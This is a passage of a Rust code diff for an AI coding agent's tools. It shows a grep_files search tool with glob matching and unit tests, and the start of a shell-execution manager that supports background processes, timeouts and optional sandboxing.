let files = collect_files(&search_path, &include_patterns, &exclude_patterns)?;
|
||||
|
||||
// Search files
|
||||
let mut results: Vec<GrepMatch> = Vec::new();
|
||||
let mut files_searched = 0;
|
||||
let mut total_matches = 0;
|
||||
|
||||
for file_path in files {
|
||||
if results.len() >= max_results {
|
||||
break;
|
||||
}
|
||||
|
||||
// Skip files that are too large
|
||||
if let Ok(metadata) = fs::metadata(&file_path)
|
||||
&& metadata.len() > MAX_FILE_SIZE
|
||||
{
|
||||
continue;
|
||||
}
|
||||
|
||||
// Read file content
|
||||
let Ok(file_content) = fs::read_to_string(&file_path) else {
|
||||
continue; // Skip binary or unreadable files
|
||||
};
|
||||
|
||||
files_searched += 1;
|
||||
let lines: Vec<&str> = file_content.lines().collect();
|
||||
|
||||
for (line_idx, line) in lines.iter().enumerate() {
|
||||
if regex.is_match(line) {
|
||||
total_matches += 1;
|
||||
|
||||
// Get context lines
|
||||
let context_before: Vec<String> = (line_idx.saturating_sub(context_lines)
|
||||
..line_idx)
|
||||
.filter_map(|i| lines.get(i).map(|s| (*s).to_string()))
|
||||
.collect();
|
||||
|
||||
let context_after: Vec<String> = ((line_idx + 1)
|
||||
..=(line_idx + context_lines).min(lines.len() - 1))
|
||||
.filter_map(|i| lines.get(i).map(|s| (*s).to_string()))
|
||||
.collect();
|
||||
|
||||
// Get relative path from workspace
|
||||
let relative_path = file_path
|
||||
.strip_prefix(&context.workspace)
|
||||
.unwrap_or(&file_path)
|
||||
.to_string_lossy()
|
||||
.to_string();
|
||||
|
||||
results.push(GrepMatch {
|
||||
file: relative_path,
|
||||
line_number: line_idx + 1,
|
||||
line: (*line).to_string(),
|
||||
context_before,
|
||||
context_after,
|
||||
});
|
||||
|
||||
if results.len() >= max_results {
|
||||
break;
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// Build result
|
||||
let result = json!({
|
||||
"matches": results,
|
||||
"total_matches": total_matches,
|
||||
"files_searched": files_searched,
|
||||
"truncated": total_matches > max_results,
|
||||
});
|
||||
|
||||
ToolResult::json(&result).map_err(|e| ToolError::execution_failed(e.to_string()))
|
||||
}
|
||||
}
|
||||
|
||||
/// Collect files to search based on include/exclude patterns
|
||||
fn collect_files(
|
||||
root: &Path,
|
||||
include_patterns: &[String],
|
||||
exclude_patterns: &[String],
|
||||
) -> Result<Vec<PathBuf>, ToolError> {
|
||||
let mut files = Vec::new();
|
||||
|
||||
if root.is_file() {
|
||||
files.push(root.to_path_buf());
|
||||
return Ok(files);
|
||||
}
|
||||
|
||||
collect_files_recursive(root, root, include_patterns, exclude_patterns, &mut files)?;
|
||||
Ok(files)
|
||||
}
|
||||
|
||||
fn collect_files_recursive(
|
||||
root: &Path,
|
||||
current: &Path,
|
||||
include_patterns: &[String],
|
||||
exclude_patterns: &[String],
|
||||
files: &mut Vec<PathBuf>,
|
||||
) -> Result<(), ToolError> {
|
||||
let entries = fs::read_dir(current).map_err(|e| {
|
||||
ToolError::execution_failed(format!(
|
||||
"Failed to read directory {}: {}",
|
||||
current.display(),
|
||||
e
|
||||
))
|
||||
})?;
|
||||
|
||||
for entry in entries {
|
||||
let entry = entry.map_err(|e| ToolError::execution_failed(e.to_string()))?;
|
||||
let path = entry.path();
|
||||
|
||||
// Get relative path for pattern matching
|
||||
let relative = path.strip_prefix(root).unwrap_or(&path);
|
||||
let relative_str = relative.to_string_lossy();
|
||||
|
||||
// Check exclusions
|
||||
if should_exclude(&relative_str, exclude_patterns) {
|
||||
continue;
|
||||
}
|
||||
|
||||
if path.is_dir() {
|
||||
collect_files_recursive(root, &path, include_patterns, exclude_patterns, files)?;
|
||||
} else if path.is_file() {
|
||||
// Check inclusions (if any specified)
|
||||
if include_patterns.is_empty() || should_include(&relative_str, include_patterns) {
|
||||
files.push(path);
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
Ok(())
|
||||
}
|
||||
|
||||
/// Check if a path matches any of the exclude patterns
|
||||
fn should_exclude(path: &str, patterns: &[String]) -> bool {
|
||||
for pattern in patterns {
|
||||
if matches_glob(path, pattern) {
|
||||
return true;
|
||||
}
|
||||
}
|
||||
false
|
||||
}
|
||||
|
||||
/// Check if a path matches any of the include patterns
|
||||
fn should_include(path: &str, patterns: &[String]) -> bool {
|
||||
for pattern in patterns {
|
||||
if matches_glob(path, pattern) {
|
||||
return true;
|
||||
}
|
||||
}
|
||||
false
|
||||
}
|
||||
|
||||
/// Simple glob pattern matching
|
||||
/// Supports: * (any chars), ** (any path), ? (single char)
|
||||
fn matches_glob(path: &str, pattern: &str) -> bool {
|
||||
// Handle ** for any path
|
||||
if pattern.contains("**") {
|
||||
let parts: Vec<&str> = pattern.split("**").collect();
|
||||
if parts.len() == 2 {
|
||||
let prefix = parts[0].trim_end_matches('/');
|
||||
let suffix = parts[1].trim_start_matches('/');
|
||||
|
||||
if !prefix.is_empty() && !path.starts_with(prefix) {
|
||||
return false;
|
||||
}
|
||||
if !suffix.is_empty() {
|
||||
return path.ends_with(suffix)
|
||||
|| path
|
||||
.split('/')
|
||||
.any(|part| matches_simple_glob(part, suffix));
|
||||
}
|
||||
return path.starts_with(prefix) || prefix.is_empty();
|
||||
}
|
||||
}
|
||||
|
||||
// Handle patterns like "*.rs" - match against filename only
|
||||
if pattern.starts_with('*') && !pattern.contains('/') {
|
||||
let filename = path.rsplit('/').next().unwrap_or(path);
|
||||
return matches_simple_glob(filename, pattern);
|
||||
}
|
||||
|
||||
// Handle patterns with path components
|
||||
if pattern.contains('/') {
|
||||
return matches_simple_glob(path, pattern);
|
||||
}
|
||||
|
||||
// Match against filename
|
||||
let filename = path.rsplit('/').next().unwrap_or(path);
|
||||
matches_simple_glob(filename, pattern)
|
||||
}
|
||||
|
||||
/// Simple glob matching for single path component
|
||||
fn matches_simple_glob(text: &str, pattern: &str) -> bool {
|
||||
let mut text_chars = text.chars().peekable();
|
||||
let mut pattern_chars = pattern.chars().peekable();
|
||||
|
||||
while let Some(p) = pattern_chars.next() {
|
||||
match p {
|
||||
'*' => {
|
||||
// Match zero or more characters
|
||||
let next_pattern: String = pattern_chars.collect();
|
||||
if next_pattern.is_empty() {
|
||||
return true;
|
||||
}
|
||||
|
||||
// Try matching at each position
|
||||
let remaining: String = text_chars.collect();
|
||||
for i in 0..=remaining.len() {
|
||||
if matches_simple_glob(&remaining[i..], &next_pattern) {
|
||||
return true;
|
||||
}
|
||||
}
|
||||
return false;
|
||||
}
|
||||
'?' => {
|
||||
// Match exactly one character
|
||||
if text_chars.next().is_none() {
|
||||
return false;
|
||||
}
|
||||
}
|
||||
c => {
|
||||
// Match literal character
|
||||
if text_chars.next() != Some(c) {
|
||||
return false;
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
text_chars.next().is_none()
|
||||
}
|
||||
|
||||
// === Unit Tests ===
|
||||
|
||||
#[cfg(test)]
|
||||
mod tests {
|
||||
use std::fs;
|
||||
|
||||
use serde_json::{Value, json};
|
||||
use tempfile::tempdir;
|
||||
|
||||
use crate::tools::spec::{ApprovalRequirement, ToolContext, ToolSpec};
|
||||
|
||||
use super::{GrepFilesTool, matches_glob};
|
||||
|
||||
#[test]
|
||||
fn test_matches_glob_star() {
|
||||
assert!(matches_glob("test.rs", "*.rs"));
|
||||
assert!(matches_glob("foo.rs", "*.rs"));
|
||||
assert!(!matches_glob("test.ts", "*.rs"));
|
||||
assert!(!matches_glob("test.rs.bak", "*.rs"));
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_matches_glob_question() {
|
||||
assert!(matches_glob("test.rs", "test.??"));
|
||||
assert!(!matches_glob("test.rs", "test.?"));
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_matches_glob_double_star() {
|
||||
assert!(matches_glob("src/main.rs", "src/**"));
|
||||
assert!(matches_glob("src/lib/mod.rs", "src/**"));
|
||||
assert!(matches_glob("node_modules/pkg/index.js", "node_modules/*"));
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_matches_glob_path() {
|
||||
assert!(matches_glob("src/main.rs", "src/*.rs"));
|
||||
assert!(!matches_glob("lib/main.rs", "src/*.rs"));
|
||||
}
|
||||
|
||||
#[tokio::test]
|
||||
async fn test_grep_files_basic() {
|
||||
let tmp = tempdir().expect("tempdir");
|
||||
let ctx = ToolContext::new(tmp.path().to_path_buf());
|
||||
|
||||
// Create test files
|
||||
fs::write(
|
||||
tmp.path().join("test.rs"),
|
||||
"fn main() {\n println!(\"hello\");\n}\n",
|
||||
)
|
||||
.expect("write");
|
||||
fs::write(
|
||||
tmp.path().join("lib.rs"),
|
||||
"pub fn hello() {}\npub fn world() {}\n",
|
||||
)
|
||||
.expect("write");
|
||||
|
||||
let tool = GrepFilesTool;
|
||||
let result = tool
|
||||
.execute(json!({"pattern": "fn"}), &ctx)
|
||||
.await
|
||||
.expect("execute");
|
||||
|
||||
assert!(result.success);
|
||||
assert!(result.content.contains("main"));
|
||||
assert!(result.content.contains("hello"));
|
||||
}
|
||||
|
||||
#[tokio::test]
|
||||
async fn test_grep_files_with_context() {
|
||||
let tmp = tempdir().expect("tempdir");
|
||||
let ctx = ToolContext::new(tmp.path().to_path_buf());
|
||||
|
||||
fs::write(
|
||||
tmp.path().join("test.txt"),
|
||||
"line1\nline2\nMATCH\nline4\nline5\n",
|
||||
)
|
||||
.expect("write");
|
||||
|
||||
let tool = GrepFilesTool;
|
||||
let result = tool
|
||||
.execute(json!({"pattern": "MATCH", "context_lines": 1}), &ctx)
|
||||
.await
|
||||
.expect("execute");
|
||||
|
||||
assert!(result.success);
|
||||
assert!(result.content.contains("line2")); // context before
|
||||
assert!(result.content.contains("line4")); // context after
|
||||
}
|
||||
|
||||
#[tokio::test]
|
||||
async fn test_grep_files_case_insensitive() {
|
||||
let tmp = tempdir().expect("tempdir");
|
||||
let ctx = ToolContext::new(tmp.path().to_path_buf());
|
||||
|
||||
fs::write(
|
||||
tmp.path().join("test.txt"),
|
||||
"Hello World\nHELLO WORLD\nhello world\n",
|
||||
)
|
||||
.expect("write");
|
||||
|
||||
let tool = GrepFilesTool;
|
||||
let result = tool
|
||||
.execute(json!({"pattern": "hello", "case_insensitive": true}), &ctx)
|
||||
.await
|
||||
.expect("execute");
|
||||
|
||||
assert!(result.success);
|
||||
// Should find all 3 lines
|
||||
let parsed: Value = serde_json::from_str(&result.content).unwrap();
|
||||
assert_eq!(parsed["total_matches"].as_u64().unwrap(), 3);
|
||||
}
|
||||
|
||||
#[tokio::test]
|
||||
async fn test_grep_files_include_filter() {
|
||||
let tmp = tempdir().expect("tempdir");
|
||||
let ctx = ToolContext::new(tmp.path().to_path_buf());
|
||||
|
||||
fs::write(tmp.path().join("test.rs"), "fn test() {}\n").expect("write");
|
||||
fs::write(tmp.path().join("test.js"), "function test() {}\n").expect("write");
|
||||
|
||||
let tool = GrepFilesTool;
|
||||
let result = tool
|
||||
.execute(json!({"pattern": "test", "include": ["*.rs"]}), &ctx)
|
||||
.await
|
||||
.expect("execute");
|
||||
|
||||
assert!(result.success);
|
||||
// Should only match .rs file
|
||||
let parsed: Value = serde_json::from_str(&result.content).unwrap();
|
||||
let matches = parsed["matches"].as_array().unwrap();
|
||||
assert_eq!(matches.len(), 1);
|
||||
let file = matches[0]["file"].as_str().unwrap();
|
||||
assert!(
|
||||
file.rsplit('.')
|
||||
.next()
|
||||
.is_some_and(|ext| ext.eq_ignore_ascii_case("rs"))
|
||||
);
|
||||
}
|
||||
|
||||
#[tokio::test]
|
||||
async fn test_grep_files_invalid_regex() {
|
||||
let tmp = tempdir().expect("tempdir");
|
||||
let ctx = ToolContext::new(tmp.path().to_path_buf());
|
||||
|
||||
let tool = GrepFilesTool;
|
||||
let result = tool.execute(json!({"pattern": "[invalid"}), &ctx).await;
|
||||
|
||||
assert!(result.is_err());
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_grep_files_tool_properties() {
|
||||
let tool = GrepFilesTool;
|
||||
assert_eq!(tool.name(), "grep_files");
|
||||
assert!(tool.is_read_only());
|
||||
assert!(tool.is_sandboxable());
|
||||
assert_eq!(tool.approval_requirement(), ApprovalRequirement::Auto);
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_parallel_support_flags() {
|
||||
let tool = GrepFilesTool;
|
||||
assert!(tool.supports_parallel());
|
||||
}
|
||||
}
|
||||
@@ -0,0 +1,982 @@
|
||||
//! Advanced shell execution with background process support and sandboxing.
|
||||
//!
|
||||
//! Provides:
|
||||
//! - Synchronous command execution with timeout
|
||||
//! - Background process execution
|
||||
//! - Process output retrieval
|
||||
//! - Process termination
|
||||
//! - Sandbox support (macOS Seatbelt)
|
||||
//! - Streaming output (future)
|
||||
|
||||
use anyhow::{Context, Result, anyhow};
|
||||
use serde::{Deserialize, Serialize};
|
||||
use std::collections::HashMap;
|
||||
use std::io::{Read, Write};
|
||||
use std::path::PathBuf;
|
||||
use std::process::{Child, Command, Stdio};
|
||||
use std::sync::{Arc, Mutex};
|
||||
use std::time::{Duration, Instant};
|
||||
use uuid::Uuid;
|
||||
use wait_timeout::ChildExt;
|
||||
|
||||
use crate::sandbox::{
|
||||
CommandSpec,
|
||||
ExecEnv,
|
||||
SandboxManager,
|
||||
SandboxPolicy as ExecutionSandboxPolicy, // Rename to avoid conflict with spec::SandboxPolicy
|
||||
SandboxType,
|
||||
};
|
||||
|
||||
/// Maximum output size before truncation (30KB like Claude Code)
|
||||
const MAX_OUTPUT_SIZE: usize = 30_000;
|
||||
|
||||
/// Status of a shell process
|
||||
#[derive(Debug, Clone, Serialize, Deserialize, PartialEq)]
|
||||
pub enum ShellStatus {
|
||||
Running,
|
||||
Completed,
|
||||
Failed,
|
||||
Killed,
|
||||
TimedOut,
|
||||
}
|
||||
|
||||
/// Result from a shell command execution
|
||||
#[derive(Debug, Clone, Serialize, Deserialize)]
|
||||
pub struct ShellResult {
|
||||
pub task_id: Option<String>,
|
||||
pub status: ShellStatus,
|
||||
pub exit_code: Option<i32>,
|
||||
pub stdout: String,
|
||||
pub stderr: String,
|
||||
pub duration_ms: u64,
|
||||
/// Whether the command was executed in a sandbox.
|
||||
#[serde(default)]
|
||||
pub sandboxed: bool,
|
||||
/// Type of sandbox used (if any).
|
||||
#[serde(skip_serializing_if = "Option::is_none")]
|
||||
pub sandbox_type: Option<String>,
|
||||
/// Whether the command was blocked by sandbox restrictions.
|
||||
#[serde(default)]
|
||||
pub sandbox_denied: bool,
|
||||
}
|
||||
|
||||
/// A background shell process being tracked
|
||||
pub struct BackgroundShell {
|
||||
pub id: String,
|
||||
pub command: String,
|
||||
pub working_dir: PathBuf,
|
||||
pub status: ShellStatus,
|
||||
pub exit_code: Option<i32>,
|
||||
pub stdout: String,
|
||||
pub stderr: String,
|
||||
pub started_at: Instant,
|
||||
pub sandbox_type: SandboxType,
|
||||
child: Option<Child>,
|
||||
stdout_thread: Option<std::thread::JoinHandle<Vec<u8>>>,
|
||||
stderr_thread: Option<std::thread::JoinHandle<Vec<u8>>>,
|
||||
}
|
||||
|
||||
impl BackgroundShell {
|
||||
/// Check if the process has completed and update status
|
||||
fn poll(&mut self) -> bool {
|
||||
if self.status != ShellStatus::Running {
|
||||
return true;
|
||||
}
|
||||
|
||||
if let Some(ref mut child) = self.child {
|
||||
match child.try_wait() {
|
||||
Ok(Some(status)) => {
|
||||
self.exit_code = status.code();
|
||||
self.status = if status.success() {
|
||||
ShellStatus::Completed
|
||||
} else {
|
||||
ShellStatus::Failed
|
||||
};
|
||||
self.collect_output();
|
||||
true
|
||||
}
|
||||
Ok(None) => false, // Still running
|
||||
Err(_) => {
|
||||
self.status = ShellStatus::Failed;
|
||||
true
|
||||
}
|
||||
}
|
||||
} else {
|
||||
true
|
||||
}
|
||||
}
|
||||
|
||||
/// Collect output from the background threads
|
||||
fn collect_output(&mut self) {
|
||||
if let Some(handle) = self.stdout_thread.take()
|
||||
&& let Ok(data) = handle.join()
|
||||
{
|
||||
self.stdout = String::from_utf8_lossy(&data).to_string();
|
||||
}
|
||||
if let Some(handle) = self.stderr_thread.take()
|
||||
&& let Ok(data) = handle.join()
|
||||
{
|
||||
self.stderr = String::from_utf8_lossy(&data).to_string();
|
||||
}
|
||||
}
|
||||
|
||||
/// Kill the process
|
||||
fn kill(&mut self) -> Result<()> {
|
||||
if let Some(ref mut child) = self.child {
|
||||
child.kill().context("Failed to kill process")?;
|
||||
let _ = child.wait(); // Reap the zombie
|
||||
self.status = ShellStatus::Killed;
|
||||
self.collect_output();
|
||||
}
|
||||
Ok(())
|
||||
}
|
||||
|
||||
/// Get a snapshot of the current state
|
||||
pub fn snapshot(&self) -> ShellResult {
|
||||
let sandboxed = !matches!(self.sandbox_type, SandboxType::None);
|
||||
ShellResult {
|
||||
task_id: Some(self.id.clone()),
|
||||
status: self.status.clone(),
|
||||
exit_code: self.exit_code,
|
||||
stdout: truncate_output(&self.stdout),
|
||||
stderr: truncate_output(&self.stderr),
|
||||
duration_ms: u64::try_from(self.started_at.elapsed().as_millis()).unwrap_or(u64::MAX),
|
||||
sandboxed,
|
||||
sandbox_type: if sandboxed {
|
||||
Some(self.sandbox_type.to_string())
|
||||
} else {
|
||||
None
|
||||
},
|
||||
sandbox_denied: false, // Determined after completion
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
/// Manages background shell processes with optional sandboxing.
|
||||
pub struct ShellManager {
|
||||
processes: HashMap<String, BackgroundShell>,
|
||||
default_workspace: PathBuf,
|
||||
sandbox_manager: SandboxManager,
|
||||
sandbox_policy: ExecutionSandboxPolicy,
|
||||
}
|
||||
|
||||
impl ShellManager {
|
||||
/// Create a new `ShellManager` with default (no sandbox) policy.
|
||||
pub fn new(workspace: PathBuf) -> Self {
|
||||
Self {
|
||||
processes: HashMap::new(),
|
||||
default_workspace: workspace,
|
||||
sandbox_manager: SandboxManager::new(),
|
||||
sandbox_policy: ExecutionSandboxPolicy::default(),
|
||||
}
|
||||
}
|
||||
|
||||
/// Create a new `ShellManager` with a specific sandbox policy.
|
||||
pub fn with_sandbox(workspace: PathBuf, policy: ExecutionSandboxPolicy) -> Self {
|
||||
Self {
|
||||
processes: HashMap::new(),
|
||||
default_workspace: workspace,
|
||||
sandbox_manager: SandboxManager::new(),
|
||||
sandbox_policy: policy,
|
||||
}
|
||||
}
|
||||
|
||||
/// Set the sandbox policy for future commands.
|
||||
pub fn set_sandbox_policy(&mut self, policy: ExecutionSandboxPolicy) {
|
||||
self.sandbox_policy = policy;
|
||||
}
|
||||
|
||||
/// Get the current sandbox policy.
|
||||
pub fn sandbox_policy(&self) -> &ExecutionSandboxPolicy {
|
||||
&self.sandbox_policy
|
||||
}
|
||||
|
||||
/// Check if sandboxing is available on this platform.
|
||||
pub fn is_sandbox_available(&mut self) -> bool {
|
||||
self.sandbox_manager.is_available()
|
||||
}
|
||||
|
||||
/// Execute a shell command with the configured sandbox policy.
|
||||
pub fn execute(
|
||||
&mut self,
|
||||
command: &str,
|
||||
working_dir: Option<&str>,
|
||||
timeout_ms: u64,
|
||||
background: bool,
|
||||
) -> Result<ShellResult> {
|
||||
self.execute_with_policy(command, working_dir, timeout_ms, background, None)
|
||||
}
|
||||
|
||||
/// Execute a shell command with a specific sandbox policy (overrides default).
|
||||
pub fn execute_with_policy(
|
||||
&mut self,
|
||||
command: &str,
|
||||
working_dir: Option<&str>,
|
||||
timeout_ms: u64,
|
||||
background: bool,
|
||||
policy_override: Option<ExecutionSandboxPolicy>,
|
||||
) -> Result<ShellResult> {
|
||||
let work_dir = working_dir.map_or_else(|| self.default_workspace.clone(), PathBuf::from);
|
||||
|
||||
// Clamp timeout to max 10 minutes (600000ms)
|
||||
let timeout_ms = timeout_ms.clamp(1000, 600_000);
|
||||
|
||||
// Use override policy if provided, otherwise use the manager's policy
|
||||
let policy = policy_override.unwrap_or_else(|| self.sandbox_policy.clone());
|
||||
|
||||
// Create command spec and prepare sandboxed environment
|
||||
let spec = CommandSpec::shell(command, work_dir.clone(), Duration::from_millis(timeout_ms))
|
||||
.with_policy(policy);
|
||||
let exec_env = self.sandbox_manager.prepare(&spec);
|
||||
|
||||
if background {
|
||||
self.spawn_background_sandboxed(command, &work_dir, &exec_env)
|
||||
} else {
|
||||
Self::execute_sync_sandboxed(command, &work_dir, timeout_ms, &exec_env)
|
||||
}
|
||||
}
|
||||
|
||||
/// Execute a shell command interactively (stdin/stdout/stderr inherit from terminal).
|
||||
pub fn execute_interactive(
|
||||
&mut self,
|
||||
command: &str,
|
||||
working_dir: Option<&str>,
|
||||
timeout_ms: u64,
|
||||
) -> Result<ShellResult> {
|
||||
self.execute_interactive_with_policy(command, working_dir, timeout_ms, None)
|
||||
}
|
||||
|
||||
/// Execute a shell command interactively with a specific sandbox policy override.
|
||||
pub fn execute_interactive_with_policy(
|
||||
&mut self,
|
||||
command: &str,
|
||||
working_dir: Option<&str>,
|
||||
timeout_ms: u64,
|
||||
policy_override: Option<ExecutionSandboxPolicy>,
|
||||
) -> Result<ShellResult> {
|
||||
let work_dir = working_dir.map_or_else(|| self.default_workspace.clone(), PathBuf::from);
|
||||
|
||||
let timeout_ms = timeout_ms.clamp(1000, 600_000);
|
||||
let policy = policy_override.unwrap_or_else(|| self.sandbox_policy.clone());
|
||||
|
||||
let spec = CommandSpec::shell(command, work_dir.clone(), Duration::from_millis(timeout_ms))
|
||||
.with_policy(policy);
|
||||
let exec_env = self.sandbox_manager.prepare(&spec);
|
||||
|
||||
Self::execute_interactive_sandboxed(command, &work_dir, timeout_ms, &exec_env)
|
||||
}
|
||||
|
||||
/// Execute command synchronously with timeout (sandboxed).
|
||||
fn execute_sync_sandboxed(
|
||||
original_command: &str,
|
||||
working_dir: &std::path::Path,
|
||||
timeout_ms: u64,
|
||||
exec_env: &ExecEnv,
|
||||
) -> Result<ShellResult> {
|
||||
let started = Instant::now();
|
||||
let timeout = Duration::from_millis(timeout_ms);
|
||||
let sandbox_type = exec_env.sandbox_type;
|
||||
let sandboxed = exec_env.is_sandboxed();
|
||||
|
||||
// Build the command from ExecEnv
|
||||
let program = exec_env.program();
|
||||
let args = exec_env.args();
|
||||
|
||||
let mut cmd = Command::new(program);
|
||||
cmd.args(args)
|
||||
.current_dir(working_dir)
|
||||
.stdout(Stdio::piped())
|
||||
.stderr(Stdio::piped());
|
||||
|
||||
// Set environment variables from exec_env
|
||||
for (key, value) in &exec_env.env {
|
||||
cmd.env(key, value);
|
||||
}
|
||||
|
||||
let mut child = cmd
|
||||
.spawn()
|
||||
.with_context(|| format!("Failed to execute: {original_command}"))?;
|
||||
|
||||
let stdout_handle = child.stdout.take().context("Failed to capture stdout")?;
|
||||
let stderr_handle = child.stderr.take().context("Failed to capture stderr")?;
|
||||
|
||||
// Spawn threads to read output
|
||||
let stdout_thread = std::thread::spawn(move || {
|
||||
let mut reader = stdout_handle;
|
||||
let mut buf = Vec::new();
|
||||
let _ = reader.read_to_end(&mut buf);
|
||||
buf
|
||||
});
|
||||
|
||||
let stderr_thread = std::thread::spawn(move || {
|
||||
let mut reader = stderr_handle;
|
||||
let mut buf = Vec::new();
|
||||
let _ = reader.read_to_end(&mut buf);
|
||||
buf
|
||||
});
|
||||
|
||||
// Wait with timeout
|
||||
if let Some(status) = child.wait_timeout(timeout)? {
|
||||
let stdout = stdout_thread.join().unwrap_or_default();
|
||||
let stderr = stderr_thread.join().unwrap_or_default();
|
||||
let stderr_str = String::from_utf8_lossy(&stderr);
|
||||
let exit_code = status.code().unwrap_or(-1);
|
||||
|
||||
// Check if sandbox denied the operation
|
||||
let sandbox_denied = SandboxManager::was_denied(sandbox_type, exit_code, &stderr_str);
|
||||
|
||||
Ok(ShellResult {
|
||||
task_id: None,
|
||||
status: if status.success() {
|
||||
ShellStatus::Completed
|
||||
} else {
|
||||
ShellStatus::Failed
|
||||
},
|
||||
exit_code: status.code(),
|
||||
stdout: truncate_output(&String::from_utf8_lossy(&stdout)),
|
||||
stderr: truncate_output(&stderr_str),
|
||||
duration_ms: u64::try_from(started.elapsed().as_millis()).unwrap_or(u64::MAX),
|
||||
sandboxed,
|
||||
sandbox_type: if sandboxed {
|
||||
Some(sandbox_type.to_string())
|
||||
} else {
|
||||
None
|
||||
},
|
||||
sandbox_denied,
|
||||
})
|
||||
} else {
|
||||
// Timeout - kill the process
|
||||
let _ = child.kill();
|
||||
let status = child.wait().ok();
|
||||
let stdout = stdout_thread.join().unwrap_or_default();
|
||||
let stderr = stderr_thread.join().unwrap_or_default();
|
||||
|
||||
Ok(ShellResult {
|
||||
task_id: None,
|
||||
status: ShellStatus::TimedOut,
|
||||
exit_code: status.and_then(|s| s.code()),
|
||||
stdout: truncate_output(&String::from_utf8_lossy(&stdout)),
|
||||
stderr: truncate_output(&String::from_utf8_lossy(&stderr)),
|
||||
duration_ms: u64::try_from(started.elapsed().as_millis()).unwrap_or(u64::MAX),
|
||||
sandboxed,
|
||||
sandbox_type: if sandboxed {
|
||||
Some(sandbox_type.to_string())
|
||||
} else {
|
||||
None
|
||||
},
|
||||
sandbox_denied: false,
|
||||
})
|
||||
}
|
||||
}
|
||||
|
||||
/// Execute command interactively with timeout (sandboxed).
|
||||
fn execute_interactive_sandboxed(
|
||||
original_command: &str,
|
||||
working_dir: &std::path::Path,
|
||||
timeout_ms: u64,
|
||||
exec_env: &ExecEnv,
|
||||
) -> Result<ShellResult> {
|
||||
let started = Instant::now();
|
||||
let timeout = Duration::from_millis(timeout_ms);
|
||||
let sandbox_type = exec_env.sandbox_type;
|
||||
let sandboxed = exec_env.is_sandboxed();
|
||||
|
||||
let program = exec_env.program();
|
||||
let args = exec_env.args();
|
||||
|
||||
let mut cmd = Command::new(program);
|
||||
cmd.args(args)
|
||||
.current_dir(working_dir)
|
||||
.stdin(Stdio::inherit())
|
||||
.stdout(Stdio::inherit())
|
||||
.stderr(Stdio::inherit());
|
||||
|
||||
for (key, value) in &exec_env.env {
|
||||
cmd.env(key, value);
|
||||
}
|
||||
|
||||
let mut child = cmd
|
||||
.spawn()
|
||||
.with_context(|| format!("Failed to execute: {original_command}"))?;
|
||||
|
||||
if let Some(status) = child.wait_timeout(timeout)? {
|
||||
Ok(ShellResult {
|
||||
task_id: None,
|
||||
status: if status.success() {
|
||||
ShellStatus::Completed
|
||||
} else {
|
||||
ShellStatus::Failed
|
||||
},
|
||||
exit_code: status.code(),
|
||||
stdout: String::new(),
|
||||
stderr: String::new(),
|
||||
duration_ms: u64::try_from(started.elapsed().as_millis()).unwrap_or(u64::MAX),
|
||||
sandboxed,
|
||||
sandbox_type: if sandboxed {
|
||||
Some(sandbox_type.to_string())
|
||||
} else {
|
||||
None
|
||||
},
|
||||
sandbox_denied: false,
|
||||
})
|
||||
} else {
|
||||
let _ = child.kill();
|
||||
let status = child.wait().ok();
|
||||
|
||||
Ok(ShellResult {
|
||||
task_id: None,
|
||||
status: ShellStatus::TimedOut,
|
||||
exit_code: status.and_then(|s| s.code()),
|
||||
stdout: String::new(),
|
||||
stderr: String::new(),
|
||||
duration_ms: u64::try_from(started.elapsed().as_millis()).unwrap_or(u64::MAX),
|
||||
sandboxed,
|
||||
sandbox_type: if sandboxed {
|
||||
Some(sandbox_type.to_string())
|
||||
} else {
|
||||
None
|
||||
},
|
||||
sandbox_denied: false,
|
||||
})
|
||||
}
|
||||
}
|
||||
|
||||
/// Spawn a background process (sandboxed).
|
||||
fn spawn_background_sandboxed(
|
||||
&mut self,
|
||||
original_command: &str,
|
||||
working_dir: &std::path::Path,
|
||||
exec_env: &ExecEnv,
|
||||
) -> Result<ShellResult> {
|
||||
let task_id = format!("shell_{}", &Uuid::new_v4().to_string()[..8]);
|
||||
let started = Instant::now();
|
||||
let sandbox_type = exec_env.sandbox_type;
|
||||
let sandboxed = exec_env.is_sandboxed();
|
||||
|
||||
// Build the command from ExecEnv
|
||||
let program = exec_env.program();
|
||||
let args = exec_env.args();
|
||||
|
||||
let mut cmd = Command::new(program);
|
||||
cmd.args(args)
|
||||
.current_dir(working_dir)
|
||||
.stdout(Stdio::piped())
|
||||
.stderr(Stdio::piped());
|
||||
|
||||
// Set environment variables from exec_env
|
||||
for (key, value) in &exec_env.env {
|
||||
cmd.env(key, value);
|
||||
}
|
||||
|
||||
let mut child = cmd
|
||||
.spawn()
|
||||
.with_context(|| format!("Failed to spawn background: {original_command}"))?;
|
||||
|
||||
let stdout_handle = child.stdout.take();
|
||||
let stderr_handle = child.stderr.take();
|
||||
|
||||
// Spawn threads to collect output
|
||||
let stdout_thread = stdout_handle.map(|handle| {
|
||||
std::thread::spawn(move || {
|
||||
let mut reader = handle;
|
||||
let mut buf = Vec::new();
|
||||
let _ = reader.read_to_end(&mut buf);
|
||||
buf
|
||||
})
|
||||
});
|
||||
|
||||
let stderr_thread = stderr_handle.map(|handle| {
|
||||
std::thread::spawn(move || {
|
||||
let mut reader = handle;
|
||||
let mut buf = Vec::new();
|
||||
let _ = reader.read_to_end(&mut buf);
|
||||
buf
|
||||
})
|
||||
});
|
||||
|
||||
let bg_shell = BackgroundShell {
|
||||
id: task_id.clone(),
|
||||
command: original_command.to_string(),
|
||||
working_dir: working_dir.to_path_buf(),
|
||||
status: ShellStatus::Running,
|
||||
exit_code: None,
|
||||
stdout: String::new(),
|
||||
stderr: String::new(),
|
||||
started_at: started,
|
||||
sandbox_type,
|
||||
child: Some(child),
|
||||
stdout_thread,
|
||||
stderr_thread,
|
||||
};
|
||||
|
||||
self.processes.insert(task_id.clone(), bg_shell);
|
||||
|
||||
Ok(ShellResult {
|
||||
task_id: Some(task_id),
|
||||
status: ShellStatus::Running,
|
||||
exit_code: None,
|
||||
stdout: String::new(),
|
||||
stderr: String::new(),
|
||||
duration_ms: 0,
|
||||
sandboxed,
|
||||
sandbox_type: if sandboxed {
|
||||
